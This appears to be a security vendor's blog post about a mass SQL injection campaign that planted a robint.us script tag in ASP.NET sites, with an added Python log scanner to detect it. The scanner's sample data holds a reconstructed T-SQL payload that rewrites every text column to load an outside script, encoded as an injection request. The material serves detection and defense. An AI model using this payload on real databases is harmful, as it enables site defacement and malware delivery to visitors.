Earlier last week, as reported by the Sucuri blog, the web was hit with a mass malware injection: a script tag referencing “robint.us/u.js” was injected into a large number of web applications. A search shows 114,000 results for infected web pages, which (unfortunately) confirms that the attack was successful.
The attack targeted a specific combination: ASP.NET applications hosted on an IIS web server that pass user-supplied page parameters into backend database queries. With today's automated attack tooling (Google dorks to find candidate targets, scripted injection, anonymous proxies to hide the source, and others), an attack on any such vulnerability can unfortunately be spread across thousands of sites in a short period of time, causing major damage.
We decided to put this attack to the test by running it against one of our very own systems (yes, we do that!) with our SecureSphere product in front of it. The result? SecureSphere caught this attack vector and blocked it, rendering it useless and keeping our WAF customer base safe.
How did it look? SecureSphere's alert shows that our default security policies caught the attack attempt and effectively blocked it.
- The attack begins as a SQL injection through a parameter of an ASP.NET web page, exploiting a known insecure function in the database. The payload is sent in encoded form and is decoded only inside the database, where it yields <script src=hxxp://ww.robint.us/u.js></script>; that string is written into the database content, so the injection is persistent (a stored cross-site scripting payload).
- A user then browses to a web page that renders the injected content; the browser loads u.js and executes it on the client side, which downloads malware (see http://www.sophos.com/blogs/sophoslabs/?p=9941 for more detail).
- Attacker wins!
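The first step of the chain above is what a WAF or a log review has to catch: the injected SQL does not arrive as readable SQL but as a hex literal that the database itself is told to decode. The following is an added example, not code from this post or from SecureSphere: a small Python scanner that walks IIS W3C request log lines, URL-decodes the query string, decodes every CAST(0x... AS [N]VARCHAR) literal it finds, and flags the ones whose decoded text contains the script tag or the system-table walk that the mass update relies on. The log lines are constructed, the field layout is the one declared in the constructed #Fields line, and the decoded T-SQL is a reconstruction of the classic cursor-over-sysobjects payload shape rather than the campaign's actual bytes.

```python
"""Detect the hex-encoded mass SQL injection pattern in IIS W3C request logs.

Added example, not code from the blog post or from SecureSphere. The log
lines below are constructed, and the decoded T-SQL is a reconstruction of
the classic cursor-over-sysobjects payload shape, not the campaign's bytes.
"""
import re
from urllib.parse import unquote_plus

# The injection hides its real SQL as a hex literal that SQL Server itself
# decodes: CAST(0x... AS VARCHAR(n)) / CAST(0x... AS NVARCHAR(n)).
CAST_HEX_RE = re.compile(
    r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?)(?:VAR)?CHAR", re.IGNORECASE
)

# Substrings that mark the decoded payload as the mass-update / script injection.
INDICATORS = ("<script", "sysobjects", "syscolumns", "robint.us", "exec(")


def decode_cast_hex(text):
    """Return the decoded string of every CAST(0x... AS [N]VARCHAR) in text."""
    decoded = []
    for m in CAST_HEX_RE.finditer(text):
        hexstr = m.group(1)
        if len(hexstr) % 2:          # malformed literal, cannot be bytes
            continue
        raw = bytes.fromhex(hexstr)
        if m.group(2):               # NVARCHAR: SQL Server stores UTF-16LE
            decoded.append(raw.decode("utf-16-le", errors="replace"))
        else:                        # VARCHAR: single-byte code page
            decoded.append(raw.decode("latin-1"))
    return decoded


def scan_query(query):
    """URL-decode a query string, decode embedded hex literals, flag indicators."""
    hits = []
    for payload in decode_cast_hex(unquote_plus(query)):
        found = [i for i in INDICATORS if i in payload.lower()]
        if found:
            hits.append({"indicators": found, "payload": payload})
    return hits


def scan_iis_log(lines):
    """Scan W3C extended log lines; assumes the constructed #Fields layout below
    (cs-uri-stem is the 5th field, cs-uri-query the 6th)."""
    findings = []
    for n, line in enumerate(lines, 1):
        if line.startswith("#") or not line.strip():
            continue
        fields = line.split()
        if len(fields) < 6:
            continue
        for hit in scan_query(fields[5]):
            findings.append({"line": n, "stem": fields[4], **hit})
    return findings


# --- constructed sample data -------------------------------------------------
# Reconstruction of the decoded payload shape: walk every text column of every
# user table and append the script tag. Defanged with "hxxp" as in the post.
PAYLOAD_SQL = (
    "DECLARE @T VARCHAR(255),@C VARCHAR(255) "
    "DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name "
    "FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' "
    "AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN "
    "EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))"
    "+''<script src=hxxp://ww.robint.us/u.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END "
    "CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
HEX_PAYLOAD = PAYLOAD_SQL.encode("ascii").hex().upper()

SAMPLE_LOG = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port "
    "cs-username c-ip sc-status",
    "2010-06-07 12:00:01 10.0.0.5 GET /products.aspx id=17 80 - 203.0.113.7 200",
    "2010-06-07 12:00:09 10.0.0.5 GET /products.aspx "
    "id=17;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x" + HEX_PAYLOAD
    + "%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 203.0.113.7 200",
    "2010-06-07 12:00:15 10.0.0.5 GET /search.aspx q=widgets 80 - 198.51.100.2 200",
]

if __name__ == "__main__":
    for f in scan_iis_log(SAMPLE_LOG):
        print(f"line {f['line']} {f['stem']}: {f['indicators']}")
        print("  decoded:", f["payload"][:80], "...")
```

Two things worth noting about the design. First, matching on the decoded text rather than on the raw request is what makes the check robust: the attacker chooses the hex bytes freely, so a signature on the encoded form is trivially evaded, while "CAST of a hex literal followed by EXEC" plus a decoded body that references sysobjects/syscolumns is a strong, low-noise signal. Second, the scanner finds the attempt, not the damage; on an application that was already hit, the same script tag has to be hunted in the text columns of the database, and the actual fix on the application side is to stop concatenating page parameters into SQL and use parameterized queries.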